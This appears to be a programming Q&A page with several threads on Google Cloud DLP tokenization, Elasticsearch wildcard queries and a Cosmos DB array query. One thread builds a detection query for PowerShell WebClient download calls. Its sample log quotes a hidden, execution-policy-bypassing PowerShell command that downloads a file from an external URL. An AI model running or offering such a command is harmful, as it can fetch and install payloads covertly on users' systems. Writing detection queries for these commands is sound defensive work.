Google Cloud DLP tokenization of tabular data with CryptoDeterministicConfig and custom infotype - regex

I am trying to tokenize a string value (passed in tabular format) using a custom regex infoType, but I run into problems as soon as the table contains more than one row. If I pass a single row, the string_value is tokenized successfully and the encoded string is returned. I'm using the Python client library for this.
For demo purposes the custom infoType currently matches any value in a string, and the wrapped key is stored in Cloud KMS (I removed it here for security reasons).
Following is the configuration that I am using:
# NOTE(review): excerpt from a function body (it ends in `return`); wrapped_key,
# key_name, surrogate_type, data_headers, dlp and parent are defined outside it.
# Construct FPE configuration dictionary
# NOTE(review): despite the "ffx_fpe" in the name, this dict is used below as
# the value of "crypto_deterministic_config".
crypto_replace_ffx_fpe_config = {
"crypto_key": {
"kms_wrapped": {
"wrapped_key": wrapped_key,
"crypto_key_name": key_name,
}
}
}
# Add surrogate type
# Only set when a surrogate type name was supplied.
if surrogate_type:
crypto_replace_ffx_fpe_config["surrogate_info_type"] = {
"name": surrogate_type
}
# Construct inspect configuration dictionary
# Only one custom regex infoType is configured; the built-in info_types and
# min_likelihood settings are commented out.
inspect_config = {
#"info_types": [{"name": info_type} for info_type in info_types],
#"min_likelihood": "VERY_UNLIKELY",
"custom_info_types": [
{
"info_type": {
"name": "custom"
},
"exclusion_type": "EXCLUSION_TYPE_UNSPECIFIED",
"likelihood": "POSSIBLE",
"regex": {
# Deliberately permissive demo pattern: accepts any run of characters.
"pattern": "(?:.*)"
#"pattern": ".*"
}
}
]
}
# Construct deidentify configuration dictionary
# The crypto config is applied through info_type_transformations; the single
# transformation lists no info_types of its own.
deidentify_config = {
"info_type_transformations": {
"transformations": [
{
"primitive_transformation": {
"crypto_deterministic_config": crypto_replace_ffx_fpe_config
}
}
]
}
}
# Table item: one header per entry in data_headers and two rows, each holding a
# single string_value cell.
item={
"table":{
"headers":[{
"name":header
} for header in data_headers
],
"rows":[
{
"values":[
{
"string_value":"asa s.com"
}
]
}, #Issue starts when the below row is added having any value in string_value
{
"values":
[
{
"string_value":"14562#gmail.com"
}
]
}
]
}
}
# Call the API
response = dlp.deidentify_content(
parent,
inspect_config=inspect_config,
deidentify_config=deidentify_config,
item=item,
)
# Return the table from the response (nothing is printed here)
return response.item.table
If I send one row of data, I get the following response:
headers {
name: "token"
}
rows {
values {
string_value: "EMAIL_ADDRESS(XX):XXXXXXXXXXXXXXXXXXX="
}
}
But when I send an item with more than one row, the API returns exactly what I sent, unchanged:
For example:
headers {
name: "token"
}
rows {
values {
string_value: "asa s.com"
}
}
rows {
values {
string_value: "14562#gmail.com"
}
}

It seems like you are using InfoTypeTransformations for DeidentifyConfig.
As per the documentation, you should use RecordTransformations instead, as this category of transformation "is applied to values within submitted tabular text data that are identified as a specific infoType, or on an entire column of tabular data" and treat the dataset as structured.

Related

ElasticSearch wildcard not returning when value has special characters

I have an elastic search service that fetches when you type into a text input to then populate a table. The search is working (returning filtered data) correctly for all alphanumeric values but not special characters (hyphens in particular). For example for the country Timor-Leste if I pass in Timor as the term I get the result but as soon as I add the hyphen (Timor-) I get an empty array response.
const queryService = {
  /**
   * Builds the JSON request body for a search that matches `tableName` and
   * applies a wildcard filter on `field`.
   *
   * The body is assembled as a plain object and serialized with
   * JSON.stringify, so quotes, backslashes and control characters in any
   * argument are escaped instead of corrupting the JSON document.
   * `*` and `?` inside `term` are passed through untouched.
   *
   * @param {string} tableName - Value matched against the "tablename" field.
   * @param {string} field - Name of the field the wildcard is applied to.
   * @param {string} [term] - Text to search for; surrounding whitespace is
   *   trimmed and the result is wrapped in `*...*`.
   * @returns {string} JSON-encoded request body.
   */
  search(tableName, field, term) {
    // If there is no search term, run the wildcard search with 20 values
    // for the smaller lists to be pre-populated, like "Gender"
    const body = {
      size: term ? 200 : 20,
      query: {
        bool: {
          must: [
            // String() keeps the same coercion the template literal applied.
            { match: { tablename: String(tableName) } },
            {
              wildcard: {
                [field]: {
                  value: term ? `*${term.trim()}*` : '*',
                  boost: 1.0,
                  rewrite: 'constant_score',
                },
              },
            },
          ],
        },
      },
    };
    return JSON.stringify(body);
  },
};
Is there a way I can modify my wildcard request to allow hyphens? The other response I've seen on here has suggested using "analyze_wildcard": true which hasn't worked. I've also tried to manually escape by putting a \ before each hyphen with .replace.
It all boils down to Elasticsearch analyzers.
By default, all text fields will be run through the standard analyzer, e.g.:
GET _analyze/
{
"text": ["Timor-Leste"],
"analyzer": "standard"
}
This will lowercase your input, strip any special chars, and produce the tokens:
["timor", "leste"]
If you'd like to forgo this default process, add a .keyword mapping:
PUT your-index/
{
"mappings": {
"properties": {
"country": {
"type": "text",
"fields": { <---
"keyword": {
"type": "keyword"
}
}
}
}
}
}
Then reindex your docs, and when dynamically constructing the wildcard query with the newly created .keyword field, make sure the hyphen (and all other special chars) is properly escaped:
POST your-index/_search
{
"query": {
"wildcard": {
"country.keyword": {
"value": "*Timor\\-*" <---
}
}
}
}

AWS ElasticSearch Query for Keyword not getting results I expect

I have an ElasticSearch query that looks like:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message.keyword": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}
And a Doc in my Index that includes:
message:Engine state is changed from None to Available. Details: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.18362.628 HostId=3dd1a50a-cc15-45e0-bf63-4456d556fb67 HostApplication=powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download EngineVersion=5.1.18362.628 RunspaceId=de762b62-056c-4be1-90bf-a12cfe6fbc72
As you can see above it includes:
(New-Object System.Net.WebClient).DownloadFile('https:....
It seems like the filter here should be matching the message, but when I execute the Query through Kibana, nothing matches even though I can see the doc above inside my index through Kibana UI if I just query for *.
I think maybe this is because the query above is querying for Message.keyword? How do I get it to successfully hit the document above?
Edit:
mapping: https://pastebin.com/cWN4jF3d
Sample data: https://pastebin.com/SyErqaG8
There are two reasons for the query not returning the result:
The field name in mapping is message whereas in query you are using Message.
A field with the keyword datatype indexes the data as is, which means matching is case sensitive as well. The document you shared contains the text System.Net.WebClient).DownloadFile(, which has upper-case characters, whereas the search pattern you expect to match it, "*system.net.webclient).downloadfile(*", is entirely lower case.
Therefore the query should be:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadFile(*"
}
}
]
}
}
}
}
}
The keyword fields are used only for exact match. You will need to match the regular fields if you only want to match a substring / subset of the string, by querying on Message instead of Message.keyword:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}

elasticsearch in json string (and / or )

I am new to AWS Elasticsearch, but I need to create queries that search the following data with different criteria.
search_metadata (JSON string with key/value pairs) - "{\"number\":\"111\"; \"area\":\"central\"; \"code\":\"1111\"; \"type\":\"internal\"}"
category - "statement" or "bill" or "email"
datetime - "2019-05-04T00:00:00" or "2019-07-16T00:01:00"
flag - "good" or "bad"
I need to construct query to do the following
An AND or OR condition on the search_metadata field (JSON string) -> I am not sure how to do this.
Combined with an AND condition on category, the datetime range and flag. -> Do I need to use multi_match for flag and category?
"query": {
"bool": {
"must": [
{
"match_phrase": {
"search_metadata": "number 111" --> not sure about AND or OR with "area" and others
}
},
{
"range": {
"datetime": {
"gte": "2019-05-04T00:00:00Z",
"lte": "2019-07-16T00:01:00Z"
}
}
}
]
}
}
}

How to read parquet file from bucket (GCS) and de-identification to specific column using DLP api?

The following is my JSON object for the DLP API call that masks specific columns of a Parquet file stored in a GCS bucket. When calling the dlp.deidentify_content() method I have to pass an item to it, and I am not sure how to pass the Parquet file; I have already specified the Parquet file path.
# NOTE(review): excerpt; info_types, custom_info_types, min_likelihood,
# max_findings, project, bucket, filename, dlp, parent and item are defined
# outside it.
# Inspection settings assembled from the caller-supplied values.
inspect_config = {
'info_types': info_types,
'custom_info_types': custom_info_types,
'min_likelihood': min_likelihood,
'limits': {'max_findings_per_request': max_findings},
}
# Save-findings action pointing at a project/dataset/table reference.
# NOTE(review): `actions` is not passed to the deidentify_content call below,
# and datasetId is the integer 1 here - confirm both are intended.
actions = [{
'saveFindings': {
'outputConfig': {
'table': {
'projectId': project,
'datasetId': 1,
'tableId': "result1"
}
}
}
}]
# Construct a storage_config containing the file's URL.
# NOTE(review): storage_config is built but not passed to the call below.
url = 'gs://{}/{}'.format(bucket, filename)
storage_config = {
'cloud_storage_options': {
'file_set': {'url': url}
}
}
# Construct deidentify configuration dictionary
# Two field transformations: the "IP-address" field is hashed as a whole, while
# in the "comments" field only PHONE_NUMBER / EMAIL_ADDRESS / IP_ADDRESS
# findings are hashed.
# NOTE(review): keys here are camelCase, unlike the snake_case keys used in
# inspect_config above - confirm the client accepts this form.
deidentify_config = {
"recordTransformations": {
"fieldTransformations": [
{
"fields": [
{
"name": "IP-address"
}
],
"primitiveTransformation": {
"cryptoHashConfig": {
"cryptoKey": {
"transient": {
"name": "[TRANSIENT-CRYPTO-KEY-1]"
}
}
}
}
},
{
"fields": [
{
"name": "comments"
}
],
"infoTypeTransformations": {
"transformations": [
{
"infoTypes": [
{
"name": "PHONE_NUMBER"
},
{
"name": "EMAIL_ADDRESS"
},
{
"name": "IP_ADDRESS"
}
],
"primitiveTransformation": {
"cryptoHashConfig": {
"cryptoKey": {
"transient": {
"name": "[TRANSIENT-CRYPTO-KEY-2]"
}
}
}
}
}
]
}
}
]
}
}
# Call the API
# `item` must be supplied by surrounding code; this excerpt never builds it.
response = dlp.deidentify_content(
parent, inspect_config=inspect_config,
deidentify_config=deidentify_config, item=item)
What I am trying to accomplish is to take a Parquet file stored in a GCS bucket, mask a few of its columns, and store the masked data as a table in BigQuery.
Parquet files are currently scanned as binary objects, as the system does not parse them smartly yet. In the V2 api the supported file types are listed here
What you can do is load your parquet file from a bucket into bigquery as documented in this guide and then parse the data from bigquery with DLP API

Azure Cosmos query to convert into List

This is my JSON data, which is stored into cosmos db
{
"id": "e064a694-8e1e-4660-a3ef-6b894e9414f7",
"Name": "Name",
"keyData": {
"Keys": [
"Government",
"Training",
"support"
]
}
}
Now I want to write a query to eliminate the keyData and get only the Keys (like below)
{
"userid": "e064a694-8e1e-4660-a3ef-6b894e9414f7",
"Name": "Name",
"Keys" :[
"Government",
"Training",
"support"
]
}
So far I tried the query like
SELECT c.id,k.Keys FROM c
JOIN k in c.keyPhraseBatchResult
Which is not working.
Update 1:
After trying Sajeetharan's suggestion I am now able to get a result, but the issue is that it produces another JSON object inside the array.
Like
{
"id": "ee885fdc-9951-40e2-b1e7-8564003cd554",
"keys": [
{
"serving": "Government"
},
{
"serving": "Training"
},
{
"serving": "support"
}
]
}
Is there any way to extract only the array, without wrapping each element in a key/value pair again?
{
"userid": "e064a694-8e1e-4660-a3ef-6b894e9414f7",
"Name": "Name",
"Keys" :[
"Government",
"Training",
"support"
]
}
You could try this one,
SELECT C.id, ARRAY(SELECT VALUE serving FROM serving IN C.keyData.Keys) AS Keys FROM C
Please use a Cosmos DB stored procedure to produce your desired format, based on @Sajeetharan's SQL.
/**
 * Stored procedure that queries every document's id together with its
 * keyData.Keys entries and flattens each entry from `{ serving: value }`
 * to the bare value before writing the feed to the response body.
 *
 * Sets the response body to 'no docs found' when the query returns an empty
 * or missing feed.
 *
 * @throws {Error} The query error, if the callback receives one, or a new
 *   Error when queryDocuments reports that the query was not accepted.
 */
function sample() {
    var collection = getContext().getCollection();
    var isAccepted = collection.queryDocuments(
        collection.getSelfLink(),
        'SELECT C.id,ARRAY(SELECT serving FROM serving IN C.keyData.Keys) AS keys FROM C',
        function (err, feed) {
            if (err) throw err;
            // Looked up once; both outcomes below write to the same response.
            var response = getContext().getResponse();
            if (!feed || !feed.length) {
                response.setBody('no docs found');
                return;
            }
            // The subquery wraps each key as { serving: value }; unwrap in place.
            feed.forEach(function (doc) {
                doc.keys = doc.keys.map(function (entry) {
                    return entry.serving;
                });
            });
            response.setBody(feed);
        });
    if (!isAccepted) throw new Error('The query was not accepted by the server.');
}
Output: